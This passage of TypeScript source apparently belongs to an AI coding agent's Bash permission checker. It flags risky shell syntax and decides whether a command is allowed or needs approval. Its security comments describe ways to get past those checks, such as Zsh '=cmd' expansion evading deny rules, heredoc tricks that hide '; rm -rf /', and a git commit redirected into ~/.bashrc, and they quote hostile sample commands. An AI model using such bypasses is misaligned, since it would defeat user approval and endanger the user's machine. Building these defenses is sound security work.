// tools/BashTool/bashSecurity.ts
// 100 KB, 2593 lines
// src/tools/BashTool/bashSecurity.ts
import { logEvent } from 'src/services/analytics/index.js'
import { extractHeredocs } from '../../utils/bash/heredoc.js'
import { ParsedCommand } from '../../utils/bash/ParsedCommand.js'
import {
  hasMalformedTokens,
  hasShellQuoteSingleQuoteBug,
  tryParseShellCommand,
} from '../../utils/bash/shellQuote.js'
import type { TreeSitterAnalysis } from '../../utils/bash/treeSitterAnalysis.js'
import type { PermissionResult } from '../../utils/permissions/PermissionResult.js'

const HEREDOC_IN_SUBSTITUTION = /\$\(.*<</

// Note: Backtick pattern is handled separately in validateDangerousPatterns
// to distinguish between escaped and unescaped backticks
const COMMAND_SUBSTITUTION_PATTERNS = [
  { pattern: /<\(/, message: 'process substitution <()' },
  { pattern: />\(/, message: 'process substitution >()' },
  { pattern: /=\(/, message: 'Zsh process substitution =()' },
  // Zsh EQUALS expansion: =cmd at word start expands to $(which cmd).
  // `=curl evil.com` → `/usr/bin/curl evil.com`, bypassing Bash(curl:*) deny
  // rules since the parser sees `=curl` as the base command, not `curl`.
  // Only matches word-initial = followed by a command-name char (not VAR=val).
  {
    pattern: /(?:^|[\s;&|])=[a-zA-Z_]/,
    message: 'Zsh equals expansion (=cmd)',
  },
  { pattern: /\$\(/, message: '$() command substitution' },
  { pattern: /\$\{/, message: '${} parameter substitution' },
  { pattern: /\$\[/, message: '$[] legacy arithmetic expansion' },
  { pattern: /~\[/, message: 'Zsh-style parameter expansion' },
  { pattern: /\(e:/, message: 'Zsh-style glob qualifiers' },
  { pattern: /\(\+/, message: 'Zsh glob qualifier with command execution' },
  {
    pattern: /\}\s*always\s*\{/,
    message: 'Zsh always block (try/always construct)',
  },
  // Defense in depth: Block PowerShell comment syntax even though we don't execute in PowerShell
  // Added as protection against future changes that might introduce PowerShell execution
  { pattern: /<#/, message: 'PowerShell comment syntax' },
]

// Zsh-specific dangerous commands that can bypass security checks.
// These are checked against the base command (first word) of each command segment.
const ZSH_DANGEROUS_COMMANDS = new Set([
  // zmodload is the gateway to many dangerous module-based attacks:
  // zsh/mapfile (invisible file I/O via array assignment),
  // zsh/system (sysopen/syswrite two-step file access),
  // zsh/zpty (pseudo-terminal command execution),
  // zsh/net/tcp (network exfiltration via ztcp),
  // zsh/files (builtin rm/mv/ln/chmod that bypass binary checks)
  'zmodload',
  // emulate with -c flag is an eval-equivalent that executes arbitrary code
  'emulate',
  // Zsh module builtins that enable dangerous operations.
  // These require zmodload first, but we block them as defense-in-depth
  // in case zmodload is somehow bypassed or the module is pre-loaded.
  'sysopen', // Opens files with fine-grained control (zsh/system)
  'sysread', // Reads from file descriptors (zsh/system)
  'syswrite', // Writes to file descriptors (zsh/system)
  'sysseek', // Seeks on file descriptors (zsh/system)
  'zpty', // Executes commands on pseudo-terminals (zsh/zpty)
  'ztcp', // Creates TCP connections for exfiltration (zsh/net/tcp)
  'zsocket', // Creates Unix/TCP sockets (zsh/net/socket)
  'mapfile', // Not actually a command, but the associative array is set via zmodload
  'zf_rm', // Builtin rm from zsh/files
  'zf_mv', // Builtin mv from zsh/files
  'zf_ln', // Builtin ln from zsh/files
  'zf_chmod', // Builtin chmod from zsh/files
  'zf_chown', // Builtin chown from zsh/files
  'zf_mkdir', // Builtin mkdir from zsh/files
  'zf_rmdir', // Builtin rmdir from zsh/files
  'zf_chgrp', // Builtin chgrp from zsh/files
])

// Numeric identifiers for bash security checks (to avoid logging strings)
const BASH_SECURITY_CHECK_IDS = {
  INCOMPLETE_COMMANDS: 1,
  JQ_SYSTEM_FUNCTION: 2,
  JQ_FILE_ARGUMENTS: 3,
  OBFUSCATED_FLAGS: 4,
  SHELL_METACHARACTERS: 5,
  DANGEROUS_VARIABLES: 6,
  NEWLINES: 7,
  DANGEROUS_PATTERNS_COMMAND_SUBSTITUTION: 8,
  DANGEROUS_PATTERNS_INPUT_REDIRECTION: 9,
  DANGEROUS_PATTERNS_OUTPUT_REDIRECTION: 10,
  IFS_INJECTION: 11,
  GIT_COMMIT_SUBSTITUTION: 12,
  PROC_ENVIRON_ACCESS: 13,
  MALFORMED_TOKEN_INJECTION: 14,
  BACKSLASH_ESCAPED_WHITESPACE: 15,
  BRACE_EXPANSION: 16,
  CONTROL_CHARACTERS: 17,
  UNICODE_WHITESPACE: 18,
  MID_WORD_HASH: 19,
  ZSH_DANGEROUS_COMMANDS: 20,
  BACKSLASH_ESCAPED_OPERATORS: 21,
  COMMENT_QUOTE_DESYNC: 22,
  QUOTED_NEWLINE: 23,
} as const

type ValidationContext = {
  originalCommand: string
  baseCommand: string
  unquotedContent: string
  fullyUnquotedContent: string
  /** fullyUnquoted before stripSafeRedirections — used by validateBraceExpansion
   * to avoid false negatives from redirection stripping creating backslash adjacencies */
  fullyUnquotedPreStrip: string
  /** Like fullyUnquotedPreStrip but preserves quote characters ('/"): e.g.,
   * echo 'x'# → echo ''# (the quote chars remain, revealing adjacency to #) */
  unquotedKeepQuoteChars: string
  /** Tree-sitter analysis data, if available. Validators can use this for
   * more accurate analysis when present, falling back to regex otherwise. */
  treeSitter?: TreeSitterAnalysis | null
}

type QuoteExtraction = {
  withDoubleQuotes: string
  fullyUnquoted: string
  /** Like fullyUnquoted but preserves quote characters ('/"): strips quoted
   * content while keeping the delimiters. Used by validateMidWordHash to detect
   * quote-adjacent # (e.g., 'x'# where quote stripping would hide adjacency). */
  unquotedKeepQuoteChars: string
}

/**
 * Walks `command` once, tracking single-quote, double-quote and
 * backslash-escape state, and builds three filtered views of it:
 *  - withDoubleQuotes: everything except single-quoted content
 *  - fullyUnquoted: only content outside both quote kinds
 *  - unquotedKeepQuoteChars: like fullyUnquoted, but the quote delimiter
 *    characters themselves are kept
 *
 * @param command - Raw command string to scan
 * @param isJq - When true, a double-quote character is not skipped after
 *   toggling state; it also flows through the normal append rules below
 * @returns The three extracted views
 */
function extractQuotedContent(command: string, isJq = false): QuoteExtraction {
  let withDoubleQuotes = ''
  let fullyUnquoted = ''
  let unquotedKeepQuoteChars = ''
  let inSingleQuote = false
  let inDoubleQuote = false
  let escaped = false

  for (let i = 0; i < command.length; i++) {
    const char = command[i]

    if (escaped) {
      escaped = false
      if (!inSingleQuote) withDoubleQuotes += char
      if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char
      if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char
      continue
    }

    if (char === '\\' && !inSingleQuote) {
      escaped = true
      if (!inSingleQuote) withDoubleQuotes += char
      if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char
      if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char
      continue
    }

    if (char === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      unquotedKeepQuoteChars += char
      continue
    }

    if (char === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      unquotedKeepQuoteChars += char
      // For jq, include quotes in extraction to ensure content is properly analyzed
      if (!isJq) continue
    }

    if (!inSingleQuote) withDoubleQuotes += char
    if (!inSingleQuote && !inDoubleQuote) fullyUnquoted += char
    if (!inSingleQuote && !inDoubleQuote) unquotedKeepQuoteChars += char
  }

  return { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars }
}

/**
 * Removes `2>&1`, `[012]> /dev/null` and `< /dev/null` redirections from
 * `content` so later redirection checks do not flag them.
 */
function stripSafeRedirections(content: string): string {
  // SECURITY: All three patterns MUST have a trailing boundary (?=\s|$).
  // Without it, `> /dev/nullo` matches `/dev/null` as a PREFIX, strips
  // `> /dev/null` leaving `o`, so `echo hi > /dev/nullo` becomes `echo hi o`.
  // validateRedirections then sees no `>` and passes. The file write to
  // /dev/nullo is auto-allowed via the read-only path (checkReadOnlyConstraints).
  // Main bashPermissions flow is protected (checkPathConstraints validates the
  // original command), but speculation.ts uses checkReadOnlyConstraints alone.
  return content
    .replace(/\s+2\s*>&\s*1(?=\s|$)/g, '')
    .replace(/[012]?\s*>\s*\/dev\/null(?=\s|$)/g, '')
    .replace(/\s*<\s*\/dev\/null(?=\s|$)/g, '')
}

/**
 * Checks if content contains an unescaped occurrence of a single character.
 * Handles bash escape sequences correctly where a backslash escapes the following character.
 *
 * IMPORTANT: This function only handles single characters, not strings. If you need to extend
 * this to handle multi-character strings, be EXTREMELY CAREFUL about shell ANSI-C quoting
 * (e.g., $'\n', $'\x41', $'\u0041') which can encode arbitrary characters and strings in ways
 * that are very difficult to parse correctly. Incorrect handling could introduce security
 * vulnerabilities by allowing attackers to bypass security checks.
 *
 * @param content - The string to search (typically from extractQuotedContent)
 * @param char - Single character to search for (e.g., '`')
 * @returns true if unescaped occurrence found, false otherwise
 *
 * Examples:
 *   hasUnescapedChar("test \`safe\`", '`') → false (escaped backticks)
 *   hasUnescapedChar("test `dangerous`", '`') → true (unescaped backticks)
 *   hasUnescapedChar("test\\`date`", '`') → true (escaped backslash + unescaped backtick)
 */
function hasUnescapedChar(content: string, char: string): boolean {
  if (char.length !== 1) {
    throw new Error('hasUnescapedChar only works with single characters')
  }

  let i = 0
  while (i < content.length) {
    // If we see a backslash, skip it and the next character (they form an escape sequence)
    if (content[i] === '\\' && i + 1 < content.length) {
      i += 2 // Skip backslash and escaped character
      continue
    }

    // Check if current character matches
    if (content[i] === char) {
      return true // Found unescaped occurrence
    }

    i++
  }

  return false // No unescaped occurrences found
}

/**
 * Allows a command that is empty or whitespace-only; otherwise passes through.
 */
function validateEmpty(context: ValidationContext): PermissionResult {
  if (!context.originalCommand.trim()) {
    return {
      behavior: 'allow',
      updatedInput: { command: context.originalCommand },
      decisionReason: { type: 'other', reason: 'Empty command is safe' },
    }
  }
  return { behavior: 'passthrough', message: 'Command is not empty' }
}

/**
 * Asks when the command looks like a fragment rather than a full command:
 * leading whitespace ending in a tab, a leading `-` (flag), or a leading
 * operator (`&&`, `||`, `;`, `>`, `>>`, `<`). Each case logs an
 * INCOMPLETE_COMMANDS event with its own subId.
 */
function validateIncompleteCommands(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context
  const trimmed = originalCommand.trim()

  if (/^\s*\t/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message: 'Command appears to be an incomplete fragment (starts with tab)',
    }
  }

  if (trimmed.startsWith('-')) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,
      subId: 2,
    })
    return {
      behavior: 'ask',
      message:
        'Command appears to be an incomplete fragment (starts with flags)',
    }
  }

  if (/^\s*(&&|\|\||;|>>?|<)/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.INCOMPLETE_COMMANDS,
      subId: 3,
    })
    return {
      behavior: 'ask',
      message:
        'Command appears to be a continuation line (starts with operator)',
    }
  }

  return { behavior: 'passthrough', message: 'Command appears complete' }
}

/**
 * Checks if a command is a "safe" heredoc-in-substitution pattern that can
 * bypass the generic $() validator.
 *
 * This is an EARLY-ALLOW path: returning `true` causes bashCommandIsSafe to
 * return `passthrough`, bypassing ALL subsequent validators. Given this
 * authority, the check must be PROVABLY safe, not "probably safe".
 *
 * The only pattern we allow is:
 *   [prefix] $(cat <<'DELIM'\n
 *   [body lines]\n
 *   DELIM\n
 *   ) [suffix]
 *
 * Where:
 * - The delimiter must be single-quoted ('DELIM') or escaped (\DELIM) so the
 *   body is literal text with no expansion
 * - The closing delimiter must be on a line BY ITSELF (or with only trailing
 *   whitespace + `)` for the $(cat <<'EOF'\n...\nEOF)` inline form)
 * - The closing delimiter must be the FIRST such line — matching bash's
 *   behavior exactly (no skipping past early delimiters to find EOF))
 * - There must be non-whitespace text BEFORE the $( (i.e., the substitution
 *   is used in argument position, not as a command name). Otherwise the
 *   heredoc body becomes an arbitrary command name with [suffix] as args.
 * - The remaining text (with the heredoc stripped) must pass all validators
 *
 * This implementation uses LINE-BASED matching, not regex [\s\S]*?, to
 * precisely replicate bash's heredoc-closing behavior.
 */
function isSafeHeredoc(command: string): boolean {
  if (!HEREDOC_IN_SUBSTITUTION.test(command)) return false

  // SECURITY: Use [ \t] (not \s) between << and the delimiter. \s matches
  // newlines, but bash requires the delimiter word on the same line as <<.
  // Matching across newlines could accept malformed syntax that bash rejects.
  // Handle quote variations: 'EOF', ''EOF'' (splitCommand may mangle quotes).
  const heredocPattern =
    /\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g
  let match
  type HeredocMatch = {
    start: number
    operatorEnd: number
    delimiter: string
    isDash: boolean
  }
  const safeHeredocs: HeredocMatch[] = []

  while ((match = heredocPattern.exec(command)) !== null) {
    const delimiter = match[2] || match[3]
    if (delimiter) {
      safeHeredocs.push({
        start: match.index,
        operatorEnd: match.index + match[0].length,
        delimiter,
        isDash: match[1] === '-',
      })
    }
  }

  // If no safe heredoc patterns found, it's not safe
  if (safeHeredocs.length === 0) return false

  // SECURITY: For each heredoc, find the closing delimiter using LINE-BASED
  // matching that exactly replicates bash's behavior. Bash closes a heredoc
  // at the FIRST line that exactly matches the delimiter. Any subsequent
  // occurrence of the delimiter is just content (or a new command). Regex
  // [\s\S]*? can skip past the first delimiter to find a later `DELIM)`
  // pattern, hiding injected commands between the two delimiters.
  type VerifiedHeredoc = { start: number; end: number }
  const verified: VerifiedHeredoc[] = []

  for (const { start, operatorEnd, delimiter, isDash } of safeHeredocs) {
    // The opening line must end immediately after the delimiter (only
    // horizontal whitespace allowed before the newline). If there's other
    // content (like `; rm -rf /`), this is not a simple safe heredoc.
    const afterOperator = command.slice(operatorEnd)
    const openLineEnd = afterOperator.indexOf('\n')
    if (openLineEnd === -1) return false // No content at all
    const openLineTail = afterOperator.slice(0, openLineEnd)
    if (!/^[ \t]*$/.test(openLineTail)) return false // Extra content on open line

    // Body starts after the newline
    const bodyStart = operatorEnd + openLineEnd + 1
    const body = command.slice(bodyStart)
    const bodyLines = body.split('\n')

    // Find the FIRST line that closes the heredoc. There are two valid forms:
    //   1. `DELIM` alone on a line (bash-standard), followed by `)` on the
    //      next line (with only whitespace before it)
    //   2. `DELIM)` on a line (the inline $(cat <<'EOF'\n...\nEOF) form,
    //      where bash's PST_EOFTOKEN closes both heredoc and substitution)
    // For <<-, leading tabs are stripped before matching.
    let closingLineIdx = -1
    let closeParenLineIdx = -1 // Line index where `)` appears
    let closeParenColIdx = -1 // Column index of `)` on that line

    for (let i = 0; i < bodyLines.length; i++) {
      const rawLine = bodyLines[i]!
      const line = isDash ? rawLine.replace(/^\t*/, '') : rawLine

      // Form 1: delimiter alone on a line
      if (line === delimiter) {
        closingLineIdx = i
        // The `)` must be on the NEXT line with only whitespace before it
        const nextLine = bodyLines[i + 1]
        if (nextLine === undefined) return false // No closing `)`
        const parenMatch = nextLine.match(/^([ \t]*)\)/)
        if (!parenMatch) return false // `)` not at start of next line
        closeParenLineIdx = i + 1
        closeParenColIdx = parenMatch[1]!.length // Position of `)`
        break
      }

      // Form 2: delimiter immediately followed by `)` (PST_EOFTOKEN form)
      // Only whitespace allowed between delimiter and `)`.
      if (line.startsWith(delimiter)) {
        const afterDelim = line.slice(delimiter.length)
        const parenMatch = afterDelim.match(/^([ \t]*)\)/)
        if (parenMatch) {
          closingLineIdx = i
          closeParenLineIdx = i
          // Column is in rawLine (pre-tab-strip), so recompute
          const tabPrefix = isDash ? (rawLine.match(/^\t*/)?.[0] ?? '') : ''
          closeParenColIdx =
            tabPrefix.length + delimiter.length + parenMatch[1]!.length
          break
        }
        // Line starts with delimiter but has other trailing content —
        // this is NOT the closing line (bash requires exact match or EOF`)`).
        // But it's also a red flag: if this were inside $(), bash might
        // close early via PST_EOFTOKEN with other shell metacharacters.
        // We already handle that case in extractHeredocs — here we just
        // reject it as not matching our safe pattern.
        if (/^[)}`|&;(<>]/.test(afterDelim)) {
          return false // Ambiguous early-closure pattern
        }
      }
    }

    if (closingLineIdx === -1) return false // No closing delimiter found

    // Compute the absolute end position (one past the `)` character)
    let endPos = bodyStart
    for (let i = 0; i < closeParenLineIdx; i++) {
      endPos += bodyLines[i]!.length + 1 // +1 for newline
    }
    endPos += closeParenColIdx + 1 // +1 to include the `)` itself

    verified.push({ start, end: endPos })
  }

  // SECURITY: Reject nested matches. The regex finds $(cat <<'X' patterns
  // in RAW TEXT without understanding quoted-heredoc semantics. When the
  // outer heredoc has a quoted delimiter (<<'A'), its body is LITERAL text
  // in bash — any inner $(cat <<'B' is just characters, not a real heredoc.
  // But our regex matches both, producing NESTED ranges. Stripping nested
  // ranges corrupts indices: after stripping the inner range, the outer
  // range's `end` is stale (points past the shrunken string), causing
  // `remaining.slice(end)` to return '' and silently drop any suffix
  // (e.g., `; rm -rf /`). Since all our matched heredocs have quoted/escaped
  // delimiters, a nested match inside the body is ALWAYS literal text —
  // no legitimate user writes this pattern. Bail to safe fallback.
  for (const outer of verified) {
    for (const inner of verified) {
      if (inner === outer) continue
      if (inner.start > outer.start && inner.start < outer.end) {
        return false
      }
    }
  }

  // Strip all verified heredocs from the command, building `remaining`.
  // Process in reverse order so earlier indices stay valid.
  const sortedVerified = [...verified].sort((a, b) => b.start - a.start)
  let remaining = command
  for (const { start, end } of sortedVerified) {
    remaining = remaining.slice(0, start) + remaining.slice(end)
  }

  // SECURITY: The remaining text must NOT start with only whitespace before
  // the (now-stripped) heredoc position IF there's non-whitespace after it.
  // If the $() is in COMMAND-NAME position (no prefix), its output becomes
  // the command to execute, with any suffix text as arguments:
  //   $(cat <<'EOF'\nchmod\nEOF\n) 777 /etc/shadow
  //   → runs `chmod 777 /etc/shadow`
  // We only allow the substitution in ARGUMENT position: there must be a
  // command word before the $(.
  // After stripping, `remaining` should look like `cmd args... [more args]`.
  // If remaining starts with only whitespace (or is empty), the $() WAS the
  // command — that's only safe if there are no trailing arguments.
  const trimmedRemaining = remaining.trim()
  if (trimmedRemaining.length > 0) {
    // There's a prefix command — good. But verify the original command
    // also had a non-whitespace prefix before the FIRST $( (the heredoc
    // could be one of several; we need the first one's prefix).
    const firstHeredocStart = Math.min(...verified.map(v => v.start))
    const prefix = command.slice(0, firstHeredocStart)
    if (prefix.trim().length === 0) {
      // $() is in command-name position but there's trailing text — UNSAFE.
      // The heredoc body becomes the command name, trailing text becomes args.
      return false
    }
  }

  // Check that remaining text contains only safe characters.
  // After stripping safe heredocs, the remaining text should only be command
  // names, arguments, quotes, and whitespace. Reject ANY shell metacharacter
  // to prevent operators (|, &, &&, ||, ;) or expansions ($, `, {, <, >) from
  // being used to chain dangerous commands after a safe heredoc.
  // SECURITY: Use explicit ASCII space/tab only — \s matches unicode whitespace
  // like \u00A0 which can be used to hide content. Newlines are also blocked
  // (they would indicate multi-line commands outside the heredoc body).
  if (!/^[a-zA-Z0-9 \t"'.\-/_@=,:+~]*$/.test(remaining)) return false

  // SECURITY: The remaining text (command with heredocs stripped) must also
  // pass all security validators. Without this, appending a safe heredoc to a
  // dangerous command (e.g., `zmodload zsh/system $(cat <<'EOF'\nx\nEOF\n)`)
  // causes this early-allow path to return passthrough, bypassing
  // validateZshDangerousCommands, validateProcEnvironAccess, and any other
  // main validator that checks allowlist-safe character patterns.
  // No recursion risk: `remaining` has no `$(... <<` pattern, so the recursive
  // call's validateSafeCommandSubstitution returns passthrough immediately.
  if (bashCommandIsSafe_DEPRECATED(remaining).behavior !== 'passthrough')
    return false

  return true
}

/**
 * Detects well-formed $(cat <<'DELIM'...DELIM) heredoc substitution patterns.
 * Returns the command with matched heredocs stripped, or null if none found.
 * Used by the pre-split gate to strip safe heredocs and re-check the remainder.
 *
 * @param command - Full command text to scan
 * @returns `command` with every accepted heredoc substitution removed, or
 *   `null` when no well-formed heredoc substitution was found
 */
export function stripSafeHeredocSubstitutions(command: string): string | null {
  if (!HEREDOC_IN_SUBSTITUTION.test(command)) return null

  const heredocPattern =
    /\$\(cat[ \t]*<<(-?)[ \t]*(?:'+([A-Za-z_]\w*)'+|\\([A-Za-z_]\w*))/g
  let match
  const ranges: Array<{ start: number; end: number }> = []
  // One past the `)` of the most recently accepted range. exec() on a global
  // regex yields matches in increasing index order, so comparing against this
  // single offset is enough to detect a match that starts inside an accepted
  // range.
  let lastAcceptedEnd = 0
  while ((match = heredocPattern.exec(command)) !== null) {
    // SECURITY: Skip matches that begin inside an already-accepted heredoc.
    // Every accepted heredoc has a quoted/escaped delimiter, so its body is
    // literal text and an inner `$(cat <<'B'` is just characters. Recording
    // it would create NESTED ranges: stripping the inner range first leaves
    // the outer range's `end` stale, so `result.slice(r.end)` skips past (or
    // entirely drops) the text that follows the outer heredoc — hiding a
    // suffix such as `; rm -rf /` from the caller's re-check.
    if (match.index < lastAcceptedEnd) continue
    // An escaped `\$(` is not a command substitution.
    if (match.index > 0 && command[match.index - 1] === '\\') continue
    const delimiter = match[2] || match[3]
    if (!delimiter) continue
    const isDash = match[1] === '-'
    const operatorEnd = match.index + match[0].length

    // Only horizontal whitespace may follow the delimiter on the opening line.
    const afterOperator = command.slice(operatorEnd)
    const openLineEnd = afterOperator.indexOf('\n')
    if (openLineEnd === -1) continue
    if (!/^[ \t]*$/.test(afterOperator.slice(0, openLineEnd))) continue

    const bodyStart = operatorEnd + openLineEnd + 1
    const bodyLines = command.slice(bodyStart).split('\n')
    for (let i = 0; i < bodyLines.length; i++) {
      const rawLine = bodyLines[i]!
      // For <<-, leading tabs are stripped before matching the delimiter.
      const line = isDash ? rawLine.replace(/^\t*/, '') : rawLine
      if (line.startsWith(delimiter)) {
        const after = line.slice(delimiter.length)
        let closePos = -1
        if (/^[ \t]*\)/.test(after)) {
          // `DELIM)` form: the `)` is on the delimiter line itself.
          const lineStart =
            bodyStart +
            bodyLines.slice(0, i).join('\n').length +
            (i > 0 ? 1 : 0)
          closePos = command.indexOf(')', lineStart)
        } else if (after === '') {
          // `DELIM` alone: the `)` must open the next line.
          const nextLine = bodyLines[i + 1]
          if (nextLine !== undefined && /^[ \t]*\)/.test(nextLine)) {
            const nextLineStart =
              bodyStart + bodyLines.slice(0, i + 1).join('\n').length + 1
            closePos = command.indexOf(')', nextLineStart)
          }
        }
        if (closePos !== -1) {
          ranges.push({ start: match.index, end: closePos + 1 })
          lastAcceptedEnd = closePos + 1
        }
        // Stop at the first line that starts with the delimiter, whether or
        // not it produced a range.
        break
      }
    }
  }
  if (ranges.length === 0) return null

  // Ranges are disjoint and ordered by start; strip back-to-front so the
  // offsets of earlier ranges stay valid.
  let result = command
  for (let i = ranges.length - 1; i >= 0; i--) {
    const r = ranges[i]!
    result = result.slice(0, r.start) + result.slice(r.end)
  }
  return result
}

/** Detection-only check: does the command contain a safe heredoc substitution? */
export function hasSafeHeredocSubstitution(command: string): boolean {
  return stripSafeHeredocSubstitutions(command) !== null
}

/**
 * Returns `allow` when the command contains a heredoc-in-substitution that
 * isSafeHeredoc accepts; otherwise passes through.
 */
function validateSafeCommandSubstitution(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context

  if (!HEREDOC_IN_SUBSTITUTION.test(originalCommand)) {
    return { behavior: 'passthrough', message: 'No heredoc in substitution' }
  }

  if (isSafeHeredoc(originalCommand)) {
    return {
      behavior: 'allow',
      updatedInput: { command: originalCommand },
      decisionReason: {
        type: 'other',
        reason:
          'Safe command substitution: cat with quoted/escaped heredoc delimiter',
      },
    }
  }

  return {
    behavior: 'passthrough',
    message: 'Command substitution needs validation',
  }
}

/**
 * Early validator for `git commit ... -m "<message>"`.
 * Returns `allow` only for a simple quoted message with a clean remainder,
 * `ask` when a double-quoted message contains substitution syntax or the
 * message starts with `-`, and `passthrough` in every other case.
 */
function validateGitCommit(context: ValidationContext): PermissionResult {
  const { originalCommand, baseCommand } = context

  if (baseCommand !== 'git' || !/^git\s+commit\s+/.test(originalCommand)) {
    return { behavior: 'passthrough', message: 'Not a git commit' }
  }

  // SECURITY: Backslashes can cause our regex to mis-identify quote boundaries
  // (e.g., `git commit -m "test\"msg" && evil`). Legitimate commit messages
  // virtually never contain backslashes, so bail to the full validator chain.
  if (originalCommand.includes('\\')) {
    return {
      behavior: 'passthrough',
      message: 'Git commit contains backslash, needs full validation',
    }
  }

  // SECURITY: The `.*?` before `-m` must NOT match shell operators. Previously
  // `.*?` matched anything except `\n`, including `;`, `&`, `|`, `` ` ``, `$(`.
  // For `git commit ; curl evil.com -m 'x'`, `.*?` swallowed `; curl evil.com `
  // leaving remainder=`` (falsy → remainder check skipped) → returned `allow`
  // for a compound command. Early-allow skips ALL main validators (line ~1908),
  // nullifying validateQuotedNewline, validateBackslashEscapedOperators, etc.
  // While splitCommand currently catches this downstream, early-allow is a
  // POSITIVE ASSERTION that the FULL command is safe — which it is NOT.
  //
  // Also: `\s+` between `git` and `commit` must NOT match `\n`/`\r` (command
  // separators in bash). Use `[ \t]+` for horizontal-only whitespace.
  //
  // The `[^;&|`$<>()\n\r]*?` class excludes shell metacharacters. We also
  // exclude `<` and `>` here (redirects) — they're allowed in the REMAINDER
  // for `--author="Name <email>"` but must not appear BEFORE `-m`.
  const messageMatch = originalCommand.match(
    /^git[ \t]+commit[ \t]+[^;&|`$<>()\n\r]*?-m[ \t]+(["'])([\s\S]*?)\1(.*)$/,
  )

  if (messageMatch) {
    const [, quote, messageContent, remainder] = messageMatch

    if (quote === '"' && messageContent && /\$\(|`|\$\{/.test(messageContent)) {
      logEvent('tengu_bash_security_check_triggered', {
        checkId: BASH_SECURITY_CHECK_IDS.GIT_COMMIT_SUBSTITUTION,
        subId: 1,
      })
      return {
        behavior: 'ask',
        message: 'Git commit message contains command substitution patterns',
      }
    }

    // SECURITY: Check remainder for shell operators that could chain commands
    // or redirect output. The `.*` before `-m` in the regex can swallow flags
    // like `--amend`, leaving `&& evil` or `> ~/.bashrc` in the remainder.
    // Previously we only checked for $() / `` / ${} here, missing operators
    // like ; | & && || < >.
    //
    // `<` and `>` can legitimately appear INSIDE quotes in --author values
    // like `--author="Name <email>"`. An UNQUOTED `>` is a shell redirect
    // operator. Because validateGitCommit is an EARLY validator, returning
    // `allow` here short-circuits bashCommandIsSafe and SKIPS
    // validateRedirections. So we must bail to passthrough on unquoted `<>`
    // to let the main validators handle it.
    //
    // Attack: `git commit --allow-empty -m 'payload' > ~/.bashrc`
    //   validateGitCommit returns allow → bashCommandIsSafe short-circuits →
    //   validateRedirections NEVER runs → ~/.bashrc overwritten with git
    //   stdout containing `payload` → RCE on next shell login.
    if (remainder && /[;|&()`]|\$\(|\$\{/.test(remainder)) {
      return {
        behavior: 'passthrough',
        message: 'Git commit remainder contains shell metacharacters',
      }
    }
    if (remainder) {
      // Strip quoted content, then check for `<` or `>`. Quoted `<>` (email
      // brackets in --author) are safe; unquoted `<>` are shell redirects.
      // NOTE: This simple quote tracker has NO backslash handling. `\'`/`\"`
      // outside quotes would desync it (bash: \' = literal ', tracker: toggles
      // SQ). BUT the backslash check at the top of this function already
      // bailed on ANY backslash in originalCommand, so we never reach here
      // with backslashes. For backslash-free input, simple quote toggling is
      // correct (no way to escape quotes without \\).
      let unquoted = ''
      let inSQ = false
      let inDQ = false
      for (let i = 0; i < remainder.length; i++) {
        const c = remainder[i]
        if (c === "'" && !inDQ) {
          inSQ = !inSQ
          continue
        }
        if (c === '"' && !inSQ) {
          inDQ = !inDQ
          continue
        }
        if (!inSQ && !inDQ) unquoted += c
      }
      if (/[<>]/.test(unquoted)) {
        return {
          behavior: 'passthrough',
          message: 'Git commit remainder contains unquoted redirect operator',
        }
      }
    }

    // Security hardening: block messages starting with dash
    // This catches potential obfuscation patterns like git commit -m "---"
    if (messageContent && messageContent.startsWith('-')) {
      logEvent('tengu_bash_security_check_triggered', {
        checkId: BASH_SECURITY_CHECK_IDS.OBFUSCATED_FLAGS,
        subId: 5,
      })
      return {
        behavior: 'ask',
        message: 'Command contains quoted characters in flag names',
      }
    }

    return {
      behavior: 'allow',
      updatedInput: { command: originalCommand },
      decisionReason: {
        type: 'other',
        reason: 'Git commit with simple quoted message is allowed',
      },
    }
  }

  return { behavior: 'passthrough', message: 'Git commit needs validation' }
}

/**
 * Validator for `jq` commands: asks when the command text contains a
 * `system(` call or one of the file/library-loading flags matched below;
 * otherwise passes through. Non-jq commands pass through untouched.
 */
function validateJqCommand(context: ValidationContext): PermissionResult {
  const { originalCommand, baseCommand } = context

  if (baseCommand !== 'jq') {
    return { behavior: 'passthrough', message: 'Not jq' }
  }

  if (/\bsystem\s*\(/.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.JQ_SYSTEM_FUNCTION,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'jq command contains system() function which executes arbitrary commands',
    }
  }

  // File arguments are now allowed - they will be validated by path validation in readOnlyValidation.ts
  // Only block dangerous flags that could read files into jq variables
  const afterJq = originalCommand.substring(3).trim()
  if (
    /(?:^|\s)(?:-f\b|--from-file|--rawfile|--slurpfile|-L\b|--library-path)/.test(
      afterJq,
    )
  ) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.JQ_FILE_ARGUMENTS,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message:
        'jq command contains dangerous flags that could execute code or read arbitrary files',
    }
  }

  return { behavior: 'passthrough', message: 'jq command is safe' }
}

/**
 * Asks when `unquotedContent` contains a quote-delimited token holding `;` or
 * `&`, or a `-name`/`-path`/`-iname` argument whose quoted value holds `;`,
 * `|` or `&`, or a `-regex` argument whose quoted value holds `;` or `&`.
 */
function validateShellMetacharacters(
  context: ValidationContext,
): PermissionResult {
